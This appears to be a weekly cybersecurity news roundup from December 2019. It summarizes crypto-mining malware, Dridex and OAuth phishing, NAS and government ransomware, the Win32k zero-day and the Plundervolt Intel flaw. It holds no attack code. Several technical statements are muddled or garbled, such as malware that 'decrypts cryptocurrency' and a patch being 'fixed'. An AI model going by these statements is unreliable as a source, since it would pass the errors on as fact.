Cybersecurity or Internet Security is of utmost importance in the digital world today. It is a body of technology, expertise, norms, and processes designed to safeguard devices, data, programs, and networks from being attacked or accessed without authorization. Cybersecurity is essential to promote as all the important officialdoms, be it the government, military, defense, or medical organizations, store massive amounts of unprecedented data on various networks, computers, and such other devices.
This virtual world of cyberspace has become an integral part of almost every aspect of our daily lives one way or the other, whether it is the idiot box providing entertainment or the internet, which provides a platform for social gatherings, book tickets, pay our bills and even close business deals. However, are you truly safe on the internet? To answer this question, here are the top cyber updates from this past week.
Crypto Mining Malware Infects 400,000 Systems In Romania
A Romanian cybergang has discovered the mining of cryptocurrency. They have designed malware that can decrypt cryptocurrency, hence can get access to the personal details of the users. A press release at the Northern District of Ohio by the US Attorney’s Office highlighted the issue.
Bucharest, Romania, is the home of the cybergang, and the malware is said to originate from there. It is not a new gang because, according to the press release, the gang has been functional since 2007.
According to an FBI special agent, Eric Smith, US citizens were the main target of the gang. They approached the users by offering the processing power of the cryptocurrency, and they used to send malware to their computer systems to steal their financial as well as other personal details.
The emails looked like any other email from a legitimate source, and the recipient used to open the email; hence would be a victim of a phishing attack.
Although it is not clear that how much amount has the gang stolen in terms of cryptocurrency; however, in US Dollars, they were able to make $4 million over the past years.
Potential Financial Services Under Dridex Malware Attack
The Cybersecurity and Infrastructure Security Agency is very suspicious about the ongoing dridex malware attacks. According to the varied sources of the Department of Homeland Security (DHS), the financial services organizations are the target for the latest phishing attacks. The financial sector is at potential risk, especially the private sector. This news was issued in the cyber awareness system that provides all the valid news related to cyber law.
Now the financial services are asked to be on alert when they do their routine, mundane work because that is what the phishing attackers are targeting. The usual email links, HTML ages, login credentials, etc., everything is being monitored. The CISA has expressly asked to use all the security in defense of Dridex network to protect the work. And this applies to all financial sectors because everybody is online here.
The issues covered by the notice are not merely covering the Trojan activities but also the security admin, the malware variants, and the mitigation that can affect the sector in any way. CISA believes that one can never be too secure; one thing that the sector will cut loose will be the link for the debacle if caused. The notice also asked to look again into the patterns followed in the recent Dridex banker attacker and look at the ways to prevent this from occurring again. The CISA wants the financial sector to have robust methods for protection against phishing in place.
Office 365 Accounts Hijacked Via Phishing Attack
Hackers are misusing Microsoft OAuth API to get into Outlook 365 accounts. The target isn’t the Password and Username. Instead, it unlocks the entire account by giving authority to the attacker to access it. The anti-phishing software was designed to prevent attacks. Such attacks impersonate the Microsoft page by the attackers; however, this is a new method that has been discovered by cybercriminals.
The worst part about this phishing attack is that it cannot be detected easily. Also, it gives complete access to the user’s account to the attacker. Most of the security software uses the OAuth standard that is related to permission and authentication. Every time a website needs access to some details, it shows a pop-up that says ‘permission requested.’ Once the user grants permission, then the developer of OAuth opens the gate for the website to access specific data.
The attackers have designed a similar pop-up that asks the user permission in the same manner and has a very minute difference. The recipient seems to think that it is a request from Microsoft via OAuth, and as soon as they accept it, the attacker gets access to read the contacts, sign-in ID and password, full access to read/write the emails and maintenance of the account as well.
Microsoft has recommended using security measures such as security awareness training, activation of multi-factor authentication, phishing protection software and review of the installed apps for authorization access.
Ransomware Threat On NAS Devices
NAS or Network-Attached Storage is used for backup purposes, at offices as well as homes. And these are under direct ransomware threats. The attacks begin by scanning the entire vulnerable NAS device available. The un-patched device will be a target to deploy the malware.
As the name suggests, this is a new way of targeting users where the attacker sends malware to encrypt the files in the system. The hackers even full drive at times. After this, the hacker sends a note to the victim and demands a ransom to decrypt the files.
According to researchers from Kaspersky, NAS devices are under direct threat of such attacks by hackers, and it can be in the form of malware. Or phishing, and even spoofing.
The latest ransomware attack detected was PureLocker, in November’19. It targets servers of big enterprises to extract and encrypt highly confidential files. Intezer and IBM X-Forces issued this report.
To prevent this from occurring, one can try not using the default credential and update their knowledge on all the latest threats and their means to hack the system. Awareness is the key to be safe because the attack occurs when a target has no clue that the links or web pages are hijacked and can cause all the havoc. It is the easiest and yet effective way to prevent attacks like the spear phishing.
Bitcoin Ransomware Locks 10 Years’ Worth Of Government Data In Argentina
The recent news that made headlines in the cyber world was the Bitcoin attackers recently hacking a data center in Argentina. What makes this attack unique is the fact that this data center houses government files, and following the events of government conspiracies from the past few years, what the attackers might uncover in the following weeks. The officials said that 7700 GB worth of data was compromised, but the center was lucky to recover 90% of it.
The attack took place on November 25, and the official statement was made later by the personnel. The attacks hacked 10 years’ worth of information, and although the files have been recovered, their decryption would take another 15 days. Decryption has to be done thoroughly as the hackers might have added a little of their contribution that can turn out to be a mess in the coming few years.
The ransom asked by the Bitcoin attackers was around $37,000- $370,000 for the exchange of files. It is still unclear if it was paid or not. According to a report by Hark Fork, ransomware named Sodinokibi earned the attacker $287,000 in terms of Bitcoins in just three days.
New Scam To Steal The Credentials
Recently the ISC security researcher, Jan Kopriva, has noticed a phishing campaign that steals the credentials. Now the reason it has made the news is that it is different from the old-fashioned phishing attacks. This campaign used email for carrying out the attacks; that email had traditional payment in the text of phishing. Now, what makes this special is that this credential phishing attack won’t lead the target to another site like regular phishing campaigns. Instead, it will lead to an HTML attachment that will make it look less suspicious to gain the trust of the user.
Usually, users detect the scam if there is a link attached, but that is not the case here. Now to avoid the links, the new campaign had opted for the self-contained web page to steal the credentials. It will take time for the user to realize that this may be a scam, and by then, the damage would be done.
Although this isn’t the first phishing campaign to use this technique, security experts say that it is one of the few to contain such a complex HTML attachment. When the targeted person opens the attachment, a Microsoft document will direct to the internet browser. The said directing will give options to login and once the credential is entered, the phishing attacker’s work is over. Even if the user realizes that this is a phishing attack, there is no use of it as the credential would be harvested. To avoid such attacks that bypass security filters, Jan Kopriva suggests using phishing prevention software, as well as other safety measures such as security awareness training.
Charities Under Attack By The Cyber Criminals As Stated By The UK Government
The UK Government issued an alert to many charitable trusts as well as homes to be careful of fraudsters. The report mentions that many cybercriminals gain access to accounts of employees by their details via spoofing.
The impersonators spoofed the emails of the employees, through which they requested the enterprise HR to change their bank account details. As this email address is similar to the email address of the actual employee, the request was supposedly granted by the enterprise officials.
Due to this, charities have been asked to take extra precautions such as providing training on email phishing prevention, cross-checking the validity of the email address in case of a bank details change request, and preventing the opening of any attachments or links contained in such email requests.
Also, the government has warned the charities not to be public about their future avenues as well as their financial matters. Keeping all of this within the organization can prevent such attacks too.
The Zero-Day Attack Fixed by Microsoft (Win32k)
On Tuesday, 10th Dec’19, Microsoft finally managed to fix the patch sent for the zero-day attack on Win32k. After releasing the December security updates, Microsoft has figured out 2 advisories for 36 vulnerable issues. Windows has already released software updates for the critical issues related to the attack.
It is advised to install these security updates on every device in order to be safe and secure from any future vulnerabilities and for phishing attack prevention. The code for the vulnerability is CVE-2019-1458, and the system updates for the same prevents the attacker from entering the kernel mode and accessing the operating system.
In total, 2 advisories were released, namely, ADV190026, ADV990001, for cleaning of orphaned keys, and updates on the latest servicing stacks. More advisories were released based on the criticality of the vulnerability; however, the above two were the ones in regards to the Win32k attack.
Ransomware Detected As ‘Maze,’ For The Cyber Attack In Pensacola
The city of Pensacola was attacked by ransomware that stole critical files from the system of the victim. This has been identified as the same malware that was used to steal files from an enterprise that deals with security names Allied Universal. The name of the malware is ‘Maze Ransomware’.
The attackers demanded a tremendous amount of money for the stolen files; however, the enterprise missed the deadline. After this, the attackers released 700 MB of files for which they asked for 300 bitcoins, which amounts to $2.3 million.
A similar incident happened in the City of Baltimore, where they stole files and demanded a ransom. Due to the negligence of the organizations against phishing attacks, cybercriminals gain access to emails of employees and are able to gain critical information via a malware attack.
Flaw Detected In Intel CPU That Manipulates The System
According to the news published on 12th Dec’19, Intel CPU had a flaw due to which the system was exposed to vulnerabilities. All the SGX-enables systems were said to be hampered due to the same. It happens with the setting of frequency and voltage in the CPU.
The settings for the same are either automatic or are manually adjusted by a technician in the Intel CPU. The SGX-enables systems had a flaw due to the same reason that frequency and voltage could also be adjusted via an injection attack named Plundervolt.
The problems that happen in the Intel CPU are:
- SGX secrets could be enabled by manipulating the voltage and frequency of the system.
- One could flip the value of the memory cell by manipulating the electrical charge and CLKSCREW, which is a flaw that enables frequency scaling as well as a dynamic voltage that takes full control over the Intel CPU.
- The cryptography of the code was challenged, and Intel SGX code execution cannot be trusted anymore.
Although the attackers have tried to attempt to barge in the security features of the SGX-enabled Intel CPU systems, Intel has already patched the challenge. They did so by disabling the access to MSR, which is the majorly affected voltage scaling interface.